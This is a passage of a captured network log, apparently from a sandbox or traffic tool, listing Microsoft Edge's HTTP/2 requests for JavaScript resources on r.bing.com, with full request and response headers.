report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:24:00 GMT
etag: 0x8DCDC617A7BA9F4
content-length: 792
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 3LAdJkykvHw5zfSSu6AY7w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8c759597-301e-0056-56c7-1702e0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=99913
expires: Thu, 13 Mar 2025 06:22:16 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fd6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 6934
content-type: text/css
content-encoding: br
content-md5: a38JzjQPFUl6CC0UlTT3Ig==
last-modified: Sat, 22 Feb 2025 09:36:49 GMT
etag: 0x8DD53246E932417
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 55fcb892-c01e-0048-5ee7-88d80d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=62623
expires: Wed, 12 Mar 2025 20:00:46 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49ebe
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:47:07 GMT
etag: 0x8DCDC64B5831289
akamai-grn: 0.d78f655f.1734315476.125e9ed0
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 492
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rSmdN6tN5TS/1yEQ8Z6pNA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 770f77f5-801e-0029-5c6a-159cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=129263
expires: Thu, 13 Mar 2025 14:31:26 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fc3
timing-allow-origin: *
GET

https://r.bing.com/rp/WwTHOlBv_iLBpZXNWkp-HzVHgrM.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/WwTHOlBv_iLBpZXNWkp-HzVHgrM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:36 GMT
etag: 0x8DCE8C30A28A766
content-type: text/javascript; charset=utf-8
content-md5: MkbY3tM5BoIJgMyWXEttiw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e43fa0c9-a01e-003e-7916-375cb1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1727
cache-control: public, no-transform, max-age=136053
expires: Thu, 13 Mar 2025 16:24:36 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fc8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/rWS0_tb2SOLTRkwVU0KG23fe_v0.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/rWS0_tb2SOLTRkwVU0KG23fe_v0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 20 Feb 2025 15:33:20 GMT
etag: 0x8DD51C3E7C92F49
content-length: 641
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: UI1Xrrd3UuLu+ZR4vyd0Dg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0d3af383-301e-0056-67ee-8302e0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=132302
expires: Thu, 13 Mar 2025 15:22:05 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fc9
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/PUv5O8bgWg4WUC9qzYb6smNVm9w.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/PUv5O8bgWg4WUC9qzYb6smNVm9w.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:50:43 GMT
etag: 0x8DCDC6535F306CD
content-length: 490
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 3vstlq/a5ZcE98e8La1vPw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2d863a91-201e-0060-6f2d-16afb2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=20557
expires: Wed, 12 Mar 2025 08:19:40 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fd0
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:31:17 GMT
etag: 0x8DCE8C2DB362309
content-length: 3498
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: qFAs4wCMzQBOlKg9KBk6eA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1c8cd8dc-201e-0060-74de-1aafb2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=324200
expires: Sat, 15 Mar 2025 20:40:23 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a49fd3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/bzAVZoOHiaJeSbLoUcTPF4HPvJQ.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/bzAVZoOHiaJeSbLoUcTPF4HPvJQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:37:29 GMT
etag: 0x8DCEC87A3ED1870
content-type: text/javascript; charset=utf-8
content-md5: F/FfhRxYlnuZTsg2+6i7VA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e2167499-b01e-006e-04b5-2643b9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1336
cache-control: public, no-transform, max-age=191559
expires: Fri, 14 Mar 2025 07:49:42 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a007
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/3s0czFTJyV5b3KCC7geWICWvvPs.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/3s0czFTJyV5b3KCC7geWICWvvPs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:11:33 GMT
etag: 0x8DCDC681EDAC2C8
content-type: text/javascript; charset=utf-8
content-md5: ItmcJflzfwBqUrBIYlGXpQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e18b7d35-c01e-0061-2e2c-17ae4f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 257
cache-control: public, no-transform, max-age=114687
expires: Thu, 13 Mar 2025 10:28:30 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a008
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 24 Jan 2025 03:33:42 GMT
etag: 0x8DD3C27E69368AB
content-length: 1307
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: qfP8i05+9c82Grr0vu52FQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5bcf9cb1-901e-003d-3b31-6e5fb6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=64917
expires: Wed, 12 Mar 2025 20:39:00 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a00a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8pMSnHJ05nB8bncpcC8ILnrRLFM.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/8pMSnHJ05nB8bncpcC8ILnrRLFM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:00:06 GMT
etag: 0x8DCDC5E23EBB645
content-length: 791
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rqa21C4TqvhBKaqsPZN5dA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 21214cb4-701e-0073-5016-169a53000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=107164
expires: Thu, 13 Mar 2025 08:23:07 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a00b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/JQLR-mMNuM8iGC3mnPsBx4hPzuo.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/JQLR-mMNuM8iGC3mnPsBx4hPzuo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:22:38 GMT
etag: 0x8DCDC6149E5871E
content-type: text/javascript; charset=utf-8
content-md5: sbJ/BFEx86eoWqpF1v/OBg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d45caf0c-501e-0020-2e31-16865c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 622
cache-control: public, no-transform, max-age=93935
expires: Thu, 13 Mar 2025 04:42:38 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a00c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 03 Jan 2025 18:42:51 GMT
etag: 0x8DD2C266DC050CA
content-type: text/javascript; charset=utf-8
content-md5: iXmM/0iacAzJj5a4uiRhcw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 71e19584-401e-001d-0da9-5e337a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 583
cache-control: public, no-transform, max-age=165082
expires: Fri, 14 Mar 2025 00:28:25 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a00d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/R5OIlHZUEYWuNhJa46yx5Wir2pM.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/R5OIlHZUEYWuNhJa46yx5Wir2pM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:33:23 GMT
etag: 0x8DCE8C3263B07E9
content-length: 825
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 80z3xDtWBrHD/WXVZ9HXMQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9b208278-901e-001f-14de-1a3180000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=128033
expires: Thu, 13 Mar 2025 14:10:56 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a00f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/-gqBS9VzaGQOAafzweDVcqAD18I.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/-gqBS9VzaGQOAafzweDVcqAD18I.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:33:01 GMT
etag: 0x8DCE8C3193D5444
content-type: text/javascript; charset=utf-8
content-md5: K6mYdssyGKO2Fe2fyESYTg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f577b309-d01e-0018-19fe-36c705000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 8536
cache-control: public, no-transform, max-age=358492
expires: Sun, 16 Mar 2025 06:11:55 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a010
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Ri3WNasD-kvXSKWETcNB7O-yYTs.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/Ri3WNasD-kvXSKWETcNB7O-yYTs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 14 Jan 2025 08:45:57 GMT
etag: 0x8DD3477DD52B87C
akamai-grn: 0.41367a5c.1738024682.1a7c002b
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: Vp50FK2RLAdVNy+Eb7RIpw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c7e5c364-901e-0050-42b1-66f598000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2897
cache-control: public, no-transform, max-age=269505
expires: Sat, 15 Mar 2025 05:28:48 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a011
timing-allow-origin: *
GET

https://r.bing.com/rp/wJ4ypLxMemRfvxvJkUCpuYEBwew.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/wJ4ypLxMemRfvxvJkUCpuYEBwew.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:56:41 GMT
etag: 0x8DD0492A397BB70
akamai-grn: 0.89777b5c.1734352226.1d266e3e
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1221
content-type: text/javascript; charset=utf-8
